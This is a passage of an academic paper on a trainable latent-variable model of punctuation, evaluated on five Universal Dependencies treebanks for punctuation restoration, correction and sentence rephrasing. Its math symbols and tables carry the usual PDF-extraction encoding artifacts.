stochastic gradient decent—with learn- ing rate 0.07, batchsize 5, sentence per epoch 400, and L2 regularization. (These hyperparam- eters, along with the regularization coefficients & and ⇠ from equation (5), were tuned on dev data (§4) for each language respectively.) We train 11We still construct the real matrix Mi(l) by ordinary ma- trix multiplication before pairing its elements with strings. This involves summation of real numbers: each element of the resulting real matrix is a marginal probability, which sums over possible PFST paths (edit sequences) that could map the underlying puncteme l to a certain substring of the surface slot xi. Similarly for Mk(r). 362 Downloaded from http://www.mitpressjournals.org/doi/pdf/10.1162/tacl_a_00273 by Carnegie Mellon University user on 06 April 2021 the punctuation model for 30 epochs. The initial NOISYCHANNEL parameters (�) are drawn from N(0, 1), and the initial ATTACH parameters (✓) are drawn from N(0, 1) (with one minor excep- tion described in Appendix A). 4 Intrinsic Evaluation of the Model Data. Throughout §§4–6, we will examine the punctuation model on a subset of the Univer- sal Dependencies (UD) version 1.4 (Nivre et al., 2016)—a collection of dependency treebanks across 47 languages with unified POS-tag and de- pendency label sets. Each treebank has designated training, development, and test portions. We ex- periment on Arabic, English, Chinese, Hindi, and Spanish (Table 2)—languages with diverse punc- tuation vocabularies and punctuation interaction rules, not to mention script directionality. For each treebank, we use the tokenization provided by UD, and take the punctuation tokens (which may be multi-character, such as ...) to be the tokens with the PUNCT tag. We replace each straight dou- ble quotation mark " with either “ or ” as appro- priate, and similarly for single quotation marks.12 We split each non-punctuation token that ends in . (such as etc.) into a shorter non-punctuation token (etc) followed by a special punctuation to- ken called the “abbreviation dot” (which is distinct from a period). We prepend a special punctuation mark ˆ to every sentence x̄, which can serve to absorb an initial comma, for example.13 We then replace each token with the special symbol UNK if its type appeared fewer than 5 times in the training portion. This gives the surface sentences. To estimate the vocabulary V of underlying punctemes, we simply collect all surface token se- quences xi that appear at any slot in the training portion of the processed treebank. This is a gener- ous estimate. Similarly, we estimate Wd (§ 2.1) as all pairs (l, r) 2 V2 that flank any d constituent. Recall that our model generates surface punctu- ation given an unpunctuated dependency tree. We train it on each of the 5 languages independently. We evaluate on conditional perplexity, which will be low if the trained model successfully assigns a high probability to the actual surface punctuation in a held-out corpus of the same language. 12For en and en_esl, “ and ” are distinguished by language-specific part-of-speech tags. For the other 4 lan- guages, we identify two " dependents of the same head word, Language Treebank #Token %Punct #Omit #Type Arabic ar 282K 7.9 255 18 Chinese zh 123K 13.8 3 23 English en 255K 11.7 40 35 en_esl 97.7K 9.8 2 16 Hindi hi 352K 6.7 21 15 Spanish es_ancora 560K 11.7 25 16 Table 2: Statistics of our datasets. “Treebank” is the UD treebank identifier, “#Token” is the number of to- kens, “%Punct” is the percentage of punctuation to- kens, “#Omit” is the small number of sentences con- taining non-leaf punctuation tokens (see footnote 19), and “#Type” is the number of punctuation types after preprocessing. (Recall from §4 that preprocessing dis- tinguishes between left and right quotation mark types, and between abbreviation dot and period dot types.) Baselines. We compare our model against three baselines to show that its complexity is necessary. Our first baseline is an ablation study that does not use latent underlying punctuation, but generates the surface punctuation directly from the tree. (To implement this, we fix the parameters of the noisy channel so that the surface punctuation equals the underlying with probability 1.) If our full model performs significantly better, it will demonstrate the importance of a distinct underlying layer. Our other two baselines ignore the tree struc- ture, so if our full model performs significantly better, it will demonstrate that conditioning on ex- plicit syntactic structure is useful. These baselines are based on previously published approaches that reduce the problem to tagging: Xu et al. (2016) use a BiLSTM-CRF tagger with bigram topology; Tilk and Alumäe (2016) use a BiGRU tagger with attention. In both approaches, the model is trained to tag each slot i with the correct string xi 2 V⇤ (possibly ✏ or ˆ). These are discriminative proba- bilistic models (in contrast to our generative one). Each gives a probability distribution over the tag- gings (conditioned on the unpunctuated sentence), so we can evaluate their perplexity.14 Results. As shown in Table 3, our full model beats the baselines in perplexity in all 5 languages. Also, in 4 of 5 languages, allowing a trained NOISYCHANNEL (rather than the identity map) replacing the left one with “ and the right one with ”. 13For symmetry, we should also have added a final mark. 14These methods learn word embeddings that optimize conditional log-likelihood on the punctuation restoration training data. They might do better if these embeddings were shared with other tasks, as multi-task learning might lead them to discover syntactic categories of words. 363 Downloaded from http://www.mitpressjournals.org/doi/pdf/10.1162/tacl_a_00273 by Carnegie Mellon University user on 06 April 2021 https://arxiv.org/abs/1906.11298 Attn. CRF ATTACH +NC DIR Arabic 1.4676 1.3016 1.2230 1.1526 L Chinese 1.6850 1.4436 1.1921 1.1464 L English 1.5737 1.5247 1.5636 1.4276 R Hindi 1.1201 1.1032 1.0630 1.0598 L Spanish 1.4397 1.3198 1.2364 1.2103 R Table 3: Results of the conditional perplexity experi- ment (§4), reported as perplexity per punctuation slot, where an unpunctuated sentence of n words has n + 1 slots. Column “Attn.” is the BiGRU tagger with atten- tion, and “CRF” stands for the BiLSTM-CRF tagger. “ATTACH” is the ablated version of our model where surface punctuation is directly attached to the nodes. Our full model “+NC” adds NOISYCHANNEL to trans- duce the attached punctuation into surface punctuation. DIR is the learned direction (§ 2.2) of our full model’s noisy channel PFST: Left-to-right or Right-to-left. Our models are given oracle parse trees T . The best per- plexity is boldfaced, along with all results that are not significantly worse (paired permutation test, p < 0.05). significantly improves the perplexity. 5 Analysis of the Learned Grammar 5.1 Rules Learned from the Noisy Channel We study our learned probability distribution over noisy channel rules (ab 7! b, ab 7! a, ab 7! ab, ab 7!ba) for English. The probability distributions corresponding to six of Nunberg’s English rules are shown in Figure 3. By comparing the orange and blue bars, observe that the model trained on the en_cesl treebank learned different quotation rules from the one trained on the en treebank. This is because en_cesl follows British style, whereas en has American-style quote transposition.15 We now focus on the model learned from the en treebank. Nunberg’s rules are deterministic, and our noisy channel indeed learned low-entropy rules, in the sense that for an input ab with un- derlying count � 25,16 at least one of the possi- ble outputs (a, b, ab or ba) always has probability > 0.75. The one exception is ”. 7!.” for which the argmax output has probability ⇡ 0.5, because writers do not apply this quote transposition rule consistently. As shown by the blue bars in Fig- ure 3, the high-probability transduction rules are 15American style places commas and periods inside the quotation marks, even if they are not logically in the quote. British style (more sensibly) places unquoted periods and commas in their logical place, sometimes outside the quo- tation marks if they are not part of the quote. 16For rarer underlying pairs ab, the estimated distributions sometimes have higher entropy due to undertraining. Figure 3: Rewrite probabilities learned for English, averaged over the last 4 epochs on en treebank (blue bars) or en_esl treebank (orange bars). The header above each figure is the underlying punctuation string (input to NOISYCHANNEL). The two counts in the fig- ure headers are the number of occurrences of the under- lying punctuation strings in the 1-best reconstruction of underlying punctuation sequences (by Algorithm 1) re- spectively in the en and en_esl treebank. Each bar represents one surface punctuation string (output of NOISYCHANNEL), its height giving the probability. consistent with Nunberg’s hand-crafted determin- istic grammar in Table 1. Our system has high precision when we look at the confident rules. Of the 24 learned edits with conditional probability > 0.75, Nunberg lists 20. Our system also has good recall. Nunberg’s hand-crafted schemata consider 16 punctuation types and generate a total of 192 edit rules, in- cluding the specimens in Table 1. That is, of the 162 = 256 possible underlying punctuation bi- grams ab, 34 are supposed to undergo absorption or transposition. Our method achieves fairly high recall, in the sense that when Nunberg proposes ab 7!�, our learned p(� | ab) usually ranks highly among all probabilities of the form p(�0 | ab). 75 of Nunberg’s rules got rank 1, 48 got rank 2, and the remaining 69 got rank > 2. The mean recipro- cal rank was 0.621. Recall is quite high when we restrict to those Nunberg rules ab 7! � for which our model is confident how to rewrite ab, in the sense that some p(�0 | ab) > 0.5. (This tends to eliminate rare ab: see footnote 5.) Of these 55 Nunberg rules, 38 rules got rank 1, 15 got rank 2, and only 2 got rank worse than 2. The mean recip- rocal rank was 0.836. ¿What about Spanish? Spanish uses inverted question marks ¿ and exclamation marks ¡, which form symmetric pairs with the regular question marks and exclamation marks. If we try to ex- trapolate to Spanish from Nunberg’s English for- 364 Downloaded from http://www.mitpressjournals.org/doi/pdf/10.1162/tacl_a_00273 by Carnegie Mellon University user on 06 April 2021 malization, the English mark most analogous to ¿ is (. Our learned noisy channel for Spanish (not graphed here) includes the high-probability rules ,¿ 7!,¿ and :¿ 7!:¿ and ¿, 7!¿ which match Nunberg’s treatment of ( in English. 5.2 Attachment Model What does our model learn about how dependency relations are marked by underlying punctuation? ˆ,Earlier, Kerry said ,“...,in fact, answer the question”. ˆEarlier, Kerry said ,“...,in fact, answer the question.” root.,advmod, ,“ccomp” ,nmod, The above example17 illustrates the use of specific puncteme pairs to set off the advmod, ccomp, and nmod relations. Notice that said takes a complement (ccomp) that is symmetrically quoted but also left delimited by a comma, which is indeed how direct speech is punctuated in English. This example also illustrates quotation transposition. The top five relations that are most likely to generate symmetric punctemes and their top (l, r) pairs are shown in Table 4. Section 1 ,2 , ,...7, and 8... Section 1 ,2 ,...7, and 8... ,conj, ,conj, conj cc The above example18 shows how our model han- dles commas in conjunctions of 2 or more phrases. UD format dictates that each conjunct after the first is attached by the conj relation. As shown above, each such conjunct is surrounded by under- lying commas (via the N.,.,.conj feature from Appendix A), except for the one that bears the conjunction and (via an even stronger weight on the C.✏.✏.��!conj.cc feature). Our learned feature weights indeed yield p(` = ✏, r = ✏) > 0.5 for the final conjunct in this example. Some writers omit the “Oxford comma” before the conjunction: this style can be achieved simply by changing “sur- rounded” to “preceded” (that is, changing the N feature to N.,.✏.conj). 6 Performance on Extrinsic Tasks We evaluate the trained punctuation model by us- ing it in the following three tasks. 17[en] Earlier, Kerry said, “Just because you get an honorable discharge does not, in fact, answer that question.” 18[en] Sections 1, 2, 5, 6, 7, and 8 will survive any termination of this License. parataxis appos list advcl ccomp 2.38 2.29 1.33 0.77 0.53 , , 26.8 , , 18.8 ✏ ✏ 60.0 ✏ ✏ 73.8 ✏ ✏ 90.8 ✏ ✏ 20.1 : ✏ 18.1 , , 22.3 , , 21.2 “ ” 2.4 ( ) 13.0 - ✏ 15.9 , ✏ 5.3 ✏ , 3.1 , , 2.4 - ✏ 9.7 ✏ ✏ 14.4 < > 3.0 ( ) 0.74 :“ ” 0.9 : ✏ 8.1 ( ) 13.1 ( ) 3.0 ✏ - 0.21 “ ,” 0.8 Table 4: The top 5 relations that are most likely to generate symmetric punctemes, the entropy of their puncteme pair (row 2), and their top 5 puncteme pairs (rows 3–7) with their probabilities shown as percent- ages. The symmetric punctemes are in boldface. 6.1 Punctuation Restoration In this task, we are given a depunctuated sentence d̄19 and must restore its (surface) punctuation. Our model supposes that the observed punctuated sen- tence x̄ would have arisen via the generative pro- cess (1). Thus, we try to find T , T 0, and x̄ that are consistent with d̄ (a partial observation of x̄). The first step is to reconstruct T from d̄. This initial parsing step is intended to choose the T that maximizes psyn(T | d̄).20 This step depends only on psyn and not on our punctuation model (p✓, p�). In practice, we choose T via a dependency parser that has been trained on an unpunctuated treebank with examples of the form (d̄, T).21 Equation (2) now defines a distribution over (T 0, x) given this T . To obtain a single prediction for x, we adopt the minimum Bayes risk (MBR) approach of choosing surface punctuation x̂ that minimizes the expected loss with respect to the unknown truth x⇤. Our loss function is the total edit distance over all slots (where edits operate on punctuation tokens). Finding x̂ exactly would be intractable, so we use a sampling-based approx- imation and draw m = 1000 samples from the posterior distribution over (T 0, x). We then define x̂ = argmin x2S(T) X x⇤2S(T) p̂(x⇤|T) · loss(x, x⇤) (10) where S(T) is the set of unique x values in the sample and p̂ is the empirical distribution given by the sample. This can be evaluated in O(m2) time. 19 To depunctuate a treebank sentence, we remove all to- kens with POS-tag PUNCT or dependency relation punct. These are almost always leaves; else we omit the sentence. 20Ideally, rather than maximize, one would integrate over possible trees T , in practice by sampling many values Tk from psyn(· | ū) and replacing S(T) in (10) with S k S(Tk). 21Specifically, the Yara parser (Rasooli and Tetreault, 2015), a fast non-probabilistic transition-based parser that uses rich non-local features (Zhang and Nivre, 2011). 365 Downloaded from http://www.mitpressjournals.org/doi/pdf/10.1162/tacl_a_00273 by Carnegie Mellon University user on 06 April 2021 https://arxiv.org/abs/1906.11298 We evaluate on Arabic, English, Chinese, Hindi, and Spanish. For each language, we train both the parser and the punctuation model on the training split of that UD treebank (§4), and evaluate on held-out data. We compare to the BiLSTM-CRF baseline in §4 (Xu et al., 2016).22 We also compare to a “trivial” deterministic base- line, which merely places a period at the end of the sentence (or a "|" in the case of Hindi) and adds no other punctuation. Because most slots do not in fact have punctuation, the trivial baseline already does very well; to improve on it, we must fix its errors without introducing new ones. Our final comparison on test data is shown in the table in Figure 4. On all 5 languages, our method beats (usually significantly) its 3 com- petitors: the trivial deterministic baseline, the BiLSTM-CRF, and the ablated version of our model (ATTACH) that omits the noisy channel. Of course, the success of our method depends on the quality of the parse trees T (which is par- ticularly low for Chinese and Arabic). The graph in Figure 4 explores this relationship, by evaluat- ing (on dev data) with noisier trees obtained from parsers that were variously trained on only the first 10%, 20%, . . . of the training data. On all 5 lan- guages, provided that the trees are at least 75% correct, our punctuation model beats both the triv- ial baseline and the BiLSTM-CRF (which do not use trees). It also beats the ATTACH ablation base- line at all levels of tree accuracy (these curves are omitted from the graph to avoid clutter). In all lan- guages, better parses give better performance, and gold trees yield the best results. 6.2 Punctuation Correction Our next goal is to correct punctuation errors in a learner corpus. Each sentence is drawn from the Cambridge Learner Corpus treebanks, which provide original (en_esl) and corrected (en_cesl) sentences. All kinds of errors are corrected, such 22We copied their architecture exactly but re-tuned the hy- perparameters on our data. We also tried tripling the amount of training data by adding unannotated sentences (provided along with the original annotated sentences by Ginter et al. (2017)), taking advantage of the fact that the BiLSTM-CRF does not require its training sentences to be annotated with trees. However, this actually hurt performance slightly, per- haps because the additional sentences were out-of-domain. We also tried the BiGRU-with-attention architecture of Tilk and Alumäe (2016), but it was also weaker than the BiLSTM- CRF (just as in Table 3). We omit all these results from Fig- ure 4 to reduce clutter. p 8 ATTACH a-- --a Arabic 0.064 0.064 0.063 0.059 0.053 Chinese 0.110 0.109 0.104 0.102 0.048 English 0.100 0.108 0.092 0.090 0.079 Hindi 0.025 0.023 0.019 0.018 0.013 Spanish 0.093 0.092 0.085 0.078 0.068 Figure 4: Edit distance per slot (which we call average edit distance, or AED) for each of the 5 corpora. Lower is better. The table gives the final AED on the test data. Its first 3 columns show the baseline methods just as in Table 3: the trivial deterministic method, the BiLSTM- CRF, and the ATTACH ablation baseline that attaches the surface punctuation directly to the tree. Column 4 is our method that incorporates a noisy channel, and column 5 (in gray) is our method using oracle (gold) trees. We boldface the best non-oracle result as well as all that are not significantly worse (paired permutation test, p < 0.05). The curves show how our method’s AED (on dev data) varies with the labeled attachment score (LAS) of the trees, where --a at x = 100 uses the oracle (gold) trees, a-- at x < 100 uses trees from our parser trained on 100% of the training data, and the #-- points at x ⌧ 100 use increasingly worse parsers. The p and 8 at the right of the graph show the AED of the trivial deterministic baseline and the BiLSTM-CRF baseline, which do not use trees. as syntax errors, but we use only the 30% of sen- tences whose depunctuated trees T are isomorphic between en_esl and en_cesl. These en_cesl trees may correct word and/or punctuation errors in en_esl, as we wish to do automatically. We assume that an English learner can make mistakes in both the attachment and the noisy channel steps. A common attachment mistake is the failure to surround a non-restrictive relative clause with commas. In the noisy channel step, mistakes in quote transposition are common. Correction model. Based on the assumption about the two error sources, we develop a dis- criminative model for this task. Let x̄e de- note the full input sentence, and let xe and xc denote the input (possibly errorful) and output (corrected) punctuation sequences. We model p(xc | x̄e) = P T P T 0c psyn(T | x̄e) · p✓(T 0c | T, xe) · p�(xc | T 0c). Here T is the depunctu- ated parse tree, T 0c is the corrected underlying tree, T 0 e is the error underlying tree, and we assume p✓(T 0 c | T, xe) = P T 0e p(T 0e | T, xe) · p✓(T 0c | T 0e). 366 Downloaded from http://www.mitpressjournals.org/doi/pdf/10.1162/tacl_a_00273 by Carnegie Mellon University user on 06 April 2021 In practice we use a 1-best pipeline rather than summing. Our first step is to reconstruct T from the error sentence x̄e. We choose T that max- imizes psyn(T | x̄e) from a dependency parser trained on en_esl treebank examples (x̄e, T ). The second step is to reconstruct T 0e based on our punc- tuation model trained on en_esl. We choose T 0e that maximizes p(T 0e | T, xe). We then reconstruct T 0 c by p(T 0c | T 0 e) = Q we2T 0e p(l, r | we) (11) where we is the node in T 0e, and p(l, r | we) is a similar log-linear model to equation (4) with addi- tional features (Appendix C4) which look at we. Finally, we reconstruct xc based on the noisy channel p�(xc | T 0c) in § 2.2. During training, � is regularized to be close to the noisy channel param- eters in the punctuation model trained on en_cesl. We use the same MBR decoder as in § 6.1 to choose the best action. We evaluate using AED as in § 6.1. As a second metric, we use the script from the CoNLL 2014 Shared Task on Grammati- cal Error Correction (Ng et al., 2014): it computes the F0.5-measure of the set of edits found by the system, relative to the true set of edits. As shown in Table 5, our method achieves bet- ter performance than the punctuation restoration baselines (which ignore input punctuation). On the other hand, it is soundly beaten by a new BiLSTM-CRF that we trained specifically for the task of punctuation correction. This is the same as the BiLSTM-CRF in the previous section, ex- cept that the BiLSTM now reads a punctuated input sentence (with possibly erroneous punctua- tion). To be precise, at step 0  i  n, the BiL- STM reads a concatenation of the embedding of word i (or BOS if i = 0) with an embedding of the punctuation token sequence xi. The BiLSTM- CRF wins because it is a discriminative model tai- lored for this task: the BiLSTM can extract arbi- trary contextual features of slot i that are corre- lated with whether xi is correct in context. 6.3 Sentential Rephrasing We suspect that syntactic transformations on a sentence should often preserve the underlying punctuation attached to its tree. The surface punc- tuation can then be regenerated from the trans- formed tree. Such transformations include ed- its that are suggested by a writing assistance tool (Heidorn, 2000), or subtree deletions in compres- sive summarization (Knight and Marcu, 2002). p 8 a-- parsed gold 8-corr AED 0.052 0.051 0.047 0.034 0.033 0.005 F0.5 0.779 0.787 0.827 0.876 0.881 0.984 Table 5: AED and F0.5 results on the test split of English-ESL data. Lower AED is better; higher F0.5 is better. The first three columns (markers corre- spond to Figure 4) are the punctuation restoration base- lines, which ignore the input punctuation. The fourth and fifth columns are our correction models, which use parsed and gold trees. The final column is the BiLSTM-CRF model tailored for the punctuation cor- rection task. For our experiment, we evaluate an interesting case of syntactic transformation. Wang and Eis- ner (2016) consider a systematic rephrasing pro- cedure by rearranging the order of dependent sub- trees within a UD treebank, in order to synthesize new languages with different word order that can then be used to help train multi-lingual systems (i.e., data augmentation with synthetic data). As Wang and Eisner acknowledge (2016, foot- note 9), their permutations treat surface punctua- tion tokens like ordinary words, which can result in synthetic sentences whose punctuation is quite unlike that of real languages. In our experiment, we use Wang and Eisner’s (2016) “self-permutation” setting, where the de- pendents of each noun and verb are stochastically reordered, but according to a dependent ordering model that has been trained on the same language. For example, rephrasing a English sentence SCONJ ADJ PUNCT DET NOUN VERB PUNCT If true , the caper failed . mark det punct advcl nsubj punct root under an English ordering model may yield DET NOUN VERB PUNCT SCONJ ADJ PUNCT the caper failed . If true , markdet root nsubj punct advcl punct which is still grammatical except that , and . are wrongly swapped (after all, they have the same POS tag and relation type). Worse, permutation may yield bizarre punctuation such as , , at the start of a sentence. Our punctuation model gives a straightforward remedy—instead of permuting the tree directly, we first discover its most likely underlying tree ˆ,If true, the caper failed. det nsubj root. mark ,advcl, by the maximizing variant of Algorithm 1 (§ 3.1). Then, we permute the underlying tree and sample the surface punctuation from the distribution modeled by the trained PFST, yielding 367 Downloaded from http://www.mitpressjournals.org/doi/pdf/10.1162/tacl_a_00273 by Carnegie Mellon University user on 06 April 2021 https://arxiv.org/abs/1906.11298 Punctuation All Base Half Full Base Half Full Arabic 156.0 231.3 186.1 540.8 590.3 553.4 Chinese 165.2 110.0 61.4 205.0 174.4 78.7 English 98.4 74.5 51.0 140.9 131.4 75.4 Hindi 10.8 11.0 9.7 118.4 118.8 91.8 Spanish 266.2 259.2 194.5 346.3 343.4 239.3 Table 6: Perplexity (evaluated on the train split to avoid evaluating generalization) of a trigram language model trained (with add-0.001 smoothing) on differ- ent versions of rephrased training sentences. “Punc- tuation” only evaluates perplexity on the trigrams that have punctuation. “All” evaluates on all the tri- grams. “Base” permutes all surface dependents includ- ing punctuation (Wang and Eisner, 2016). “Full” is our full approach: recover underlying punctuation, per- mute remaining dependents, regenerate surface punc- tuation. “Half” is like “Full” but it permutes the non- punctuation tokens identically to “Base.” The permu- tation model is trained on surface trees or recovered underlying trees T 0, respectively. In each 3-way com- parison, we boldface the best result (always significant under a paired permutation test over per-sentence log- probabilities, p < 0.05). ˆthe caper failed ,If true,. ˆthe caper failed ,If true . det nsubj root. mark ,advcl, We leave the handling of capitalization to future work. We test the naturalness of the permuted sen- tences by asking how well a word trigram lan- guage model trained on them could predict the original sentences.23 As shown in Table 6, our per- mutation approach reduces the perplexity over the baseline on 4 of the 5 languages, often dramati- cally. 7 Related Work Punctuation can aid syntactic analysis, since it signals phrase boundaries and sentence structure. Briscoe (1994) and White and Rajkumar (2008) parse punctuated sentences using hand-crafted constraint-based grammars that implement Nun- berg’s approach in a declarative way. These gram- mars treat surface punctuation symbols as ordi- nary words, but annotate the nonterminal cate- gories so as to effectively keep track of the under- lying punctuation. This is tantamount to crafting a grammar for underlyingly punctuated sentences and composing it with a finite-state noisy channel. 23So the two approaches to permutation yield different training data, but are compared fairly on the same test data. The parser of Ma et al. (2014) takes a differ- ent approach and treats punctuation marks as fea- tures of their neighboring words. Zhang et al. (2013) use a generative model for punctuated sen- tences, leting them restore punctuation marks dur- ing transition-based parsing of unpunctuated sen- tences. Li et al. (2005) use punctuation marks to segment a sentence: this "divide and rule" strat- egy reduces ambiguity in parsing of long Chinese sentences. Punctuation can similarly be used to constrain syntactic structure during grammar in- duction (Spitkovsky et al., 2011). Punctuation restoration (§ 6.1) is useful for tran- scribing text from unpunctuated speech. The task is usually treated by tagging each slot with zero or more punctuation tokens, using a traditional sequence labeling method: conditional random fields (Lui and Wang, 2013; Lu and Ng, 2010), re- current neural networks (Tilk and Alumäe, 2016), or transition-based systems (Ballesteros and Wan- ner, 2016). 8 Conclusion and Future Work We have provided a new computational approach to modeling punctuation. In our model, syntactic constituents stochastically generate latent under- lying left and right punctemes. Surface punctu- ation marks are not directly attached to the syn- tax tree, but are generated from sequences of adja- cent punctemes by a (stochastic) finite-state string rewriting process . Our model is inspired by Nun- berg’s (1990) formal grammar for English punctu- ation, but is probabilistic and trainable. We give exact algorithms for training and inference. We trained Nunberg-like models for 5 lan- guages and L2 English. We compared the English model to Nunberg’s, and showed how the trained models can be used across languages for punctua- tion restoration, correction, and adjustment. In the future, we would like to study the usefulness of the recovered underlying trees on tasks such as syntactically sensitive sentiment analysis (Tai et al., 2015), machine translation (Cowan et al., 2006), relation extraction (Cu- lotta and Sorensen, 2004), and coreference reso- lution (Kong et al., 2010). We would also like to investigate how underlying punctuation could aid parsing. For discriminative parsing, features for scoring the tree could refer to the underly- ing punctuation, not just the surface punctuation. For generative parsing (§3), we could follow the 368 Downloaded from http://www.mitpressjournals.org/doi/pdf/10.1162/tacl_a_00273 by Carnegie Mellon University user on 06 April 2021 scheme in equation (1). For example, the psyn factor in equation (1) might be a standard re- current neural network grammar (RNNG) (Dyer et al., 2016); when a subtree of T is completed by the REDUCE operation of psyn, the punctuation- augmented RNNG (1) would stochastically attach subtree-external left and right punctemes with p✓ and transduce the subtree-internal slots with p�. In the future, we are also interested in enriching the T 0 representation and making it more differ- ent from T , to underlyingly account for other phe- nomena in T such as capitalization, spacing, mor- phology, and non-projectivity (via reordering). Acknowledgments This material is based upon work supported by the National Science Foundation under Grant Nos. 1423276 and 1718846, including a REU supple- ment to the first author. We are grateful to the state of Maryland for the Maryland Advanced Research Computing Center, a crucial resource. We thank Xiaochen Li for early discussion, Argo lab mem- bers for further discussion, and the three reviewers for quality comments. References Apoorv Agarwal, Boyi Xie, Ilia Vovsha, Owen Rambow, and Rebecca Passonneau. 2011. Sen- timent analysis of Twitter data. In Proceedings of the Workshop on Language in Social Media (LSM 2011), pages 30–38. Miguel Ballesteros and Leo Wanner. 2016. A neu- ral network architecture for multilingual punc- tuation generation. In Proceedings of the 2016 Conference on Empirical Methods in Natural Language Processing, pages 1048–1053. Yehoshua Bar-Hillel, M. Perles, and E. Shamir. 1961. On formal properties of simple phrase structure grammars. Zeitschrift für Phonetik, Sprachwissenschaft und Kommunika- tionsforschung, 14:143–172. Reprinted in Y. Bar-Hillel (1964), Language and Information: Selected Essays on their Theory and Applica- tion, Addison-Wesley 1964, pages 116–150. Jean Berstel and Christophe Reutenauer. 1988. Rational Series and their Languages. Springer- Verlag. Ann Bies, Mark Ferguson, Karen Katz, Robert MacIntyre, Victoria Tredinnick, Grace Kim, Mary Ann Marcinkiewicz, and Britta Schas- berger. 1995. Bracketing guidelines for Tree- bank II style: Penn Treebank project. Technical Report MS-CIS-95-06, University of Pennsyl- vania. Ted Briscoe. 1994. Parsing (with) punctuation, etc. Technical report, Xerox European Re- search Laboratory. Danqi Chen and Christopher Manning. 2014. A fast and accurate dependency parser using neu- ral networks. In Proceedings of the 2014 Con- ference on Empirical Methods in Natural Lan- guage Processing (EMNLP), pages 740–750. Noam Chomsky and Morris Halle. 1968. The Sound Pattern of English. Harper and Row, New York. Ryan Cotterell, Nanyun Peng, and Jason Eisner. 2014. Stochastic contextual edit distance and probabilistic FSTs. In Proceedings of the 52nd Annual Meeting of the Association for Compu- tational Linguistics (Volume 2: Short Papers), pages 625–630. Ryan Cotterell, Nanyun Peng, and Jason Eisner. 2015. Modeling word forms using latent under- lying morphs and phonology. Transactions of the Association for Computational Linguistics (TACL), 3:433–447. Ryan Cotterell, Tim Vieira, and Hinrich Schütze. 2016. A joint model of orthography and mor- phological segmentation. In Proceedings of the 2016 Conference of the North American Chapter of the Association for Computational Linguistics: Human Language Technologies (NAACL-HLT), pages 664–669. Brooke Cowan, Ivona Kučerová, and Michael Collins. 2006. A discriminative model for tree- to-tree translation. In Proceedings of the 2006 Conference on Empirical Methods in Natural Language Processing (EMNLP), pages 232– 241. Aron Culotta and Jeffrey Sorensen. 2004. De- pendency tree kernels for relation extraction. In Proceedings of the 42nd Annual Meeting of the Association for Computational Linguistics (ACL). 369 Downloaded from http://www.mitpressjournals.org/doi/pdf/10.1162/tacl_a_00273 by Carnegie Mellon University user on 06 April 2021 http://www.aclweb.org/anthology/W11-0705 http://www.aclweb.org/anthology/W11-0705 https://doi.org/10.18653/v1/D16-1111 https://doi.org/10.18653/v1/D16-1111 https://doi.org/10.18653/v1/D16-1111 http://search.proquest.com/openview/fb41296047fb7453dcb1de182b4aa0b6/1 http://search.proquest.com/openview/fb41296047fb7453dcb1de182b4aa0b6/1 ftp://ftp.cis.upenn.edu/pub/treebank/doc/manual/root.ps.gz ftp://ftp.cis.upenn.edu/pub/treebank/doc/manual/root.ps.gz https://www.cl.cam.ac.uk/~ejb1/punct-pos-parsing.ps https://www.cl.cam.ac.uk/~ejb1/punct-pos-parsing.ps https://doi.org/10.3115/v1/D14-1082 https://doi.org/10.3115/v1/D14-1082 https://doi.org/10.3115/v1/D14-1082 https://doi.org/10.3115/v1/P14-2102 https://doi.org/10.3115/v1/P14-2102 http://cs.jhu.edu/~jason/papers/#cotterell-peng-eisner-2015 http://cs.jhu.edu/~jason/papers/#cotterell-peng-eisner-2015 http://www.aclweb.org/anthology/N16-1080 http://www.aclweb.org/anthology/N16-1080 http://www.aclweb.org/anthology/W06-1628 http://www.aclweb.org/anthology/W06-1628 http://www.aclweb.org/anthology/P04-1054 http://www.aclweb.org/anthology/P04-1054 Timothy Dozat and Christopher Manning. 2017. Efficient third-order dependency parsers. In Proceedings of the 5th International Confer- ence on Learning Representations (ICLR). Chris Dyer, Adhiguna Kuncoro, Miguel Balles- teros, and Noah A. Smith. 2016. Recurrent neural network grammars. In Proceedings of the 2016 Conference of the North American Chapter of the Association for Computational Linguistics: Human Language Technologies (NAACL-HLT), pages 199–209. Jason Eisner. 1996. Three new probabilistic mod- els for dependency parsing: An exploration. In Proceedings of the 16th International Confer- ence on Computational Linguistics (COLING), pages 340–345. Jason Eisner. 2016. Inside-outside and forward- backward algorithms are just backprop. In Pro- ceedings of the EMNLP Workshop on Struc- tured Prediction for NLP. A. Caracciolo di Forino. 1968. String process- ing languages and generalized Markov algo- rithms. In D. G. Bobrow, editor, Symbol Manip- ulation Languages and Techniques, pages 191– 206. North-Holland Publishing Company, Am- sterdam. Kuzman Ganchev, Jennifer Gillenwater, and Ben Taskar. 2010. Posterior regularization for struc- tured latent variable models. Journal of Ma- chine Learning Research, 11:2001–2049. Filip Ginter, Jan Hajič, Juhani Luotolahti, Milan Straka, and Daniel Zeman. 2017. CoNLL 2017 shared task - automatically annotated raw texts and word embeddings. LINDAT/CLARIN dig- ital library at the Institute of Formal and Ap- plied Linguistics (ÚFAL), Faculty of Mathe- matics and Physics, Charles University. Yoav Goldberg and Michael Elhadad. 2010. An efficient algorithm for easy-first non-directional dependency parsing. In Human Language Technologies: The 2010 Annual Conference of the North American Chapter of the Association for Computational Linguistics (NAACL-HLT), pages 742–750. Joshua Goodman. 1999. Semiring parsing. Com- putational Linguistics, 25(4):573–605. George Heidorn. 2000. Intelligent writing assis- tance. In Robert Dale, Herman Moisl, and Harold Somers, editors, Handbook of Natural Language Processing, pages 181–207. Marcel Dekker, New York. C. Douglas Johnson. 1972. Formal Aspects of Phonological Description. Mouton. Bernard E. M. Jones. 1994. Exploring the role of punctuation in parsing natural text. In COLING 1994 Volume 1: The 15th International Confer- ence on Computational Linguistics. Diederik Kingma and Jimmy Ba. 2014. Adam: A method for stochastic optimization. In Proceed- ings of the International Conference on Learn- ing Representations (ICLR). Eliyahu Kiperwasser and Yoav Goldberg. 2016. Simple and accurate dependency parsing us- ing bidirectional LSTM feature representations. Transactions of the Association for Computa- tional Linguistics (TACL), 4:313–327. Kevin Knight and Daniel Marcu. 2002. Summa- rization beyond sentence extraction: A proba- bilistic approach to sentence compression. Ar- tificial Intelligence, 139(1):91–107. Fang Kong, Guodong Zhou, Longhua Qian, and Qiaoming Zhu. 2010. Dependency-driven anaphoricity determination for coreference res- olution. In Proceedings of the 23rd Interna- tional Conference on Computational Linguis- tics (COLING), pages 599–607. Terry Koo and Michael Collins. 2010. Efficient third-order dependency parsers. In Proceedings of the 48th Annual Meeting of the Association for Computational Linguistics 